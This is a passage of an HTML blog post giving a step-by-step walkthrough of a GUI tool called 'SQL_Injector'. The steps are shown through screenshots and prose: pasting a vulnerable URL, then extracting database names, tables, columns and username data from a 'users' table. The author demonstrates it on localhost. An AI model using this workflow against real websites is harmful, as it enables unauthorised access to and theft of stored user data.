<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Q5_S3OmWEArADqVBcrJMnTFwxoukenWhCqlnGfEOlqaZSNKbqbqU0bZR9TZnkIQZ8_Y79ljBcjutizLR72qytrqUO0cM9ajcQHkHuGjLzAKT2AUvNKekp3MzyVX0zxbwhxzHixPqFNk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9Q5_S3OmWEArADqVBcrJMnTFwxoukenWhCqlnGfEOlqaZSNKbqbqU0bZR9TZnkIQZ8_Y79ljBcjutizLR72qytrqUO0cM9ajcQHkHuGjLzAKT2AUvNKekp3MzyVX0zxbwhxzHixPqFNk/s1600/2.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
2. The next step is to provide the vulnerable URL to ‘SQL_Injector’. <br />
Suppose your target URL is “website.com/page.php?parameter=something”. Just paste this vulnerable URL in the ‘injectable url’ section and hit the ‘extract databases’ button.<br />
I am performing it on my localhost for demonstration. The following snapshot can be taken as reference:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pSwHIGHq58l9PaUxV0IoObZq7xAm4vmbj2Hn4JgDRN7ZCSOKCs558AhdqCoBGKi7gL1sKbAnhyNePZhZfRK1ZKHcK0cD9pRYWDlcNS_sS1LzQSCHj8let6DX5mJXpxXcDKDEoV1ZKMo/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1pSwHIGHq58l9PaUxV0IoObZq7xAm4vmbj2Hn4JgDRN7ZCSOKCs558AhdqCoBGKi7gL1sKbAnhyNePZhZfRK1ZKHcK0cD9pRYWDlcNS_sS1LzQSCHj8let6DX5mJXpxXcDKDEoV1ZKMo/s1600/4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<br />
In the next few moments you will get the results in a text area: the names of the databases present on the server. Check out the snapshot:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimejdyPN-Vu2sezcPiezuGMzJ0NTEQfgT5eJl0_jeUKoozsQZM5eUr64m7pp55FQuXZDXQJUCxRI3kj03ZzuLszpd2v4JebJzomf39JtA5oOaGuxiPYrMCbOjF6rClw_eul2-PEIMlXjU/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimejdyPN-Vu2sezcPiezuGMzJ0NTEQfgT5eJl0_jeUKoozsQZM5eUr64m7pp55FQuXZDXQJUCxRI3kj03ZzuLszpd2v4JebJzomf39JtA5oOaGuxiPYrMCbOjF6rClw_eul2-PEIMlXjU/s1600/5.png" /></a></div>
<div style="text-align: left;">
<br />
3. The next step is to extract the tables present in the selected database. Enter the name of the ‘database’ of which you want to extract all the tables and hit ‘extract tables’. In my case I will proceed with the database named “security”.</div>
<div style="text-align: left;">
Refer following snapshot:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGwHAQwz_Q8YOfKpx-vMmN1cr7axi7kahYXiW7dYqZ-UBK_H1nIkziIknADJpywW1mBN2YGAIJzIL7di_0hSLhxvJ4bvOuLL5GN-m75yCQOLctUTNXI5QY4Th7Jh4Rle7O_mv9iFlSKGM/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGwHAQwz_Q8YOfKpx-vMmN1cr7axi7kahYXiW7dYqZ-UBK_H1nIkziIknADJpywW1mBN2YGAIJzIL7di_0hSLhxvJ4bvOuLL5GN-m75yCQOLctUTNXI5QY4Th7Jh4Rle7O_mv9iFlSKGM/s1600/6.png" /></a></div>
<div style="text-align: left;">
<br />
In the next few moments you will get the names of all the tables present within the database. E.g.:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY2gq4TRt4FPo-UWkMtY8RoRepO_40qAXa76pbIpQC_Syg7Ro3pHfQHgbeWieCoW2Sm2ibBebbhwa2VSadMD1NFqMS0CzCxExKILRGcmw9bB2NPCwEJaUcK5pt1kS11ZExW_m-nkTQPzw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY2gq4TRt4FPo-UWkMtY8RoRepO_40qAXa76pbIpQC_Syg7Ro3pHfQHgbeWieCoW2Sm2ibBebbhwa2VSadMD1NFqMS0CzCxExKILRGcmw9bB2NPCwEJaUcK5pt1kS11ZExW_m-nkTQPzw/s1600/7.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
4. In the next step we will extract the columns. Choose any table from the list and proceed to the columns of that table. Enter the name of the column in the ‘extract columns’ section. I will proceed with the table 'users'.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFebMbUO05r9b0IpLKwmivm2QcvlaPnzWr3eo6_4hLvEqE8Z7MYjS-1Wua9qBFDVJf20o-_Wn3YWvFbkYHO5YZF_eH9cyTJJAmdk2SrmBV3CD913reAemnIQpQuNFBODoIJlUyxOawBSU/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFebMbUO05r9b0IpLKwmivm2QcvlaPnzWr3eo6_4hLvEqE8Z7MYjS-1Wua9qBFDVJf20o-_Wn3YWvFbkYHO5YZF_eH9cyTJJAmdk2SrmBV3CD913reAemnIQpQuNFBODoIJlUyxOawBSU/s1600/8.png" /></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br />
After some time you will get all the column names from the entered table.</div>
<div style="text-align: left;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIHoi92m98tmcLK0aOL8HWA1vNtUgyCiNsLAFuhnvJFUv6GSuV4qKzvWVsxgYlA-fqBQHq5oEqSLq_JsNqZ89H3doqrmHhz0_j6UtZvJ1KPIDLCaVFg6FDzHl37-AvYVb9VENLRpgVLgw/s1600/9.png" /><br />
<br />
<br />
5. Now it's time to dump the data from the columns. You can extract data from the columns either one by one or all at once. Simply enter the names of the columns, separating them with a comma (,) for multiple-column data.<br />
Refer to the following snapshot:</div>
<div style="text-align: left;">
<br />
(i) For single column data, enter any column name in the 'column name' section and hit the 'Extract data' button. I will go with the column 'username'. Check out the next snapshot for reference:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ePdPHDhLNlkmxjU1MSiGShG4x7L7cgMoe_3xeg8617LFIpFYImWpfRlApjBYbJMbOd4uj8cUG2IvvuuDFRoBDE6WeFrH7Y0CtjYA1jyTfYgX37s6luQ4gY-cUAxaQ_zoSeuPfxnCLlE/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_ePdPHDhLNlkmxjU1MSiGShG4x7L7cgMoe_3xeg8617LFIpFYImWpfRlApjBYbJMbOd4uj8cUG2IvvuuDFRoBDE6WeFrH7Y0CtjYA1jyTfYgX37s6luQ4gY-cUAxaQ_zoSeuPfxnCLlE/s1600/10.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The SQL_Injector result for the column 'username' is shown in a text area, as on the screen below: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOxOMoOaf-G_r-3IzeRBen-Evx-qhGl2UvPlOfhmcUQDMLtYxQJiTUQzkiFjq-9o_w2dvdhmHtkLrGunXg1tzk6LRJsxGFA-igaBrT90ypSqeDpaRBuCO4suizXCpIDDhJXJeu0yIfY_s/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOxOMoOaf-G_r-3IzeRBen-Evx-qhGl2UvPlOfhmcUQDMLtYxQJiTUQzkiFjq-9o_w2dvdhmHtkLrGunXg1tzk6LRJsxGFA-igaBrT90ypSqeDpaRBuCO4suizXCpIDDhJXJeu0yIfY_s/s1600/11.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br />
(ii) For multiple-column data, enter the column names as shown in the following image:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI651diYbMs2nuDC13nRT98gYwCSUeqry8ywObjWBKC_gVd7blcVbAZZ1zqyzcQZp9ap1kCJ5bSU1_6sRquO6IhNwvhiWnCSeaplrZAG7jspbuOwpwoiO2tLfL2aUbLmFfUwOmtJ88x44/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI651diYbMs2nuDC13nRT98gYwCSUeqry8ywObjWBKC_gVd7blcVbAZZ1zqyzcQZp9ap1kCJ5bSU1_6sRquO6IhNwvhiWnCSeaplrZAG7jspbuOwpwoiO2tLfL2aUbLmFfUwOmtJ88x44/s1600/12.png" /></a></div>
<span id="goog_1057028778"></span><br />
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The result for all the columns will look something like the next image:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWC1Ka6bCusDytBrzxuKl8XbvIzYXWOIiwA4qTi3ybyabUzPHphBoWw6FSrxSRpCQUlHw1oyY6DjnXUBC8UO288mvlp1zkDAhcGNzLVmJUWmGePpDP5MevK9N1x07WOCgQFUrpXjUVS8/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDWC1Ka6bCusDytBrzxuKl8XbvIzYXWOIiwA4qTi3ybyabUzPHphBoWw6FSrxSRpCQUlHw1oyY6DjnXUBC8UO288mvlp1zkDAhcGNzLVmJUWmGePpDP5MevK9N1x07WOCgQFUrpXjUVS8/s1600/13.png" /></a></div>
<div style="text-align: left;">
<br />
<br />
So… this is SQL_Injector version-1, with basic functionality. I am working on adding more features and will release version-2 very soon.</div>
<br /></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0